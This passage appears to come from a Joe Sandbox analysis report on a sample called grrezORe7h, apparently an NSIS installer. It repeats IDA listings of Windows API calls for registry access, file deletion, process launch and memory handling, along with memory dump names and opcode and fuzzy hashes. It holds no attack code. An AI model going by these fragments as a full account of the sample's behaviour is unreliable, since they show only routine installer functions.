                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                      • String ID: verifying installer: %d%%
                                                                                                                      • API String ID: 1451636040-82062127
                                                                                                                      • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                      • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                                      • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                      • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(?), ref: 00401D59
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                      • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                      • String ID: Calibri
                                                                                                                      • API String ID: 3808545654-1409258342
                                                                                                                      • Opcode ID: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                                      • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                                      • Opcode Fuzzy Hash: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                                      • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2138429838.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2138407292.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2138443925.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2138472692.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1780285237-0
                                                                                                                      • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                      • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                                      • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                      • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                                      APIs
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2667972263-0
                                                                                                                      • Opcode ID: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                                                                                                      • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                                                                                                      • Opcode Fuzzy Hash: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                                                                                                      • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                                                                                                      APIs
                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsuC465.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsuC465.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsuC465.tmp$C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dll
                                                                                                                      • API String ID: 3109718747-3798628405
                                                                                                                      • Opcode ID: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                                      • Instruction ID: 733a5b8a3421de7103486a8e2fd1e7248c9e7ae9f3a69bb90da27b1d5488d101
                                                                                                                      • Opcode Fuzzy Hash: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                                      • Instruction Fuzzy Hash: E011EB71A01205BBDB10AF718F49A9F3265DF44754F24403BF501F61C2EAFC9D91566D
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2138429838.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2138407292.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2138443925.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2138472692.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeGlobal
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2979337801-0
                                                                                                                      • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                                      • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                                                                                      • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                                      • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1912718029-0
                                                                                                                      • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                      • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                                      • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                      • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                                      APIs
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                      • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2138429838.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2138407292.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2138443925.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2138472692.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1148316912-0
                                                                                                                      • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                      • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                      • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                      • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1849352358-0
                                                                                                                      • Opcode ID: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                                      • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                                      • Opcode Fuzzy Hash: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                                      • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                      • wsprintfW.USER32 ref: 00404A1A
                                                                                                                      • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                      • String ID: %u.%u%s%s
                                                                                                                      • API String ID: 3540041739-3551169577
                                                                                                                      • Opcode ID: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                                      • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                                      • Opcode Fuzzy Hash: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                                      • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                                      APIs
                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                      • String ID: !
                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                      • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                      • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                                      • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                      • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F4C
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F6D
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F90
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                      • String ID: Call
                                                                                                                      • API String ID: 3677997916-1824292864
                                                                                                                      • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                      • Instruction ID: 7b18913d2a4f7d1a63d21b64be8b0843a819b9ea39c2317e7442ba644687e02f
                                                                                                                      • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                      • Instruction Fuzzy Hash: 1801483110060AAECB218F66ED08EAB3BA8EF94350F01402AFD44D2260D734D964CBA5
                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A0F
                                                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A19
                                                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405A2B
                                                                                                                      Strings
                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A09
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                      • API String ID: 2659869361-3081826266
                                                                                                                      • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                      • Instruction ID: 6c4fcacab342d11fcc3e0291a3358bee332e4b98312e181ff459d3a43eef6c86
                                                                                                                      • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                      • Instruction Fuzzy Hash: E4D0A771101D306AC211EB548C04DDF72ACAE45344381007BF502B30E1CB7C1D618BFE
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                        • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                        • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                                        • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                        • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                        • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                        • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                        • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                        • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
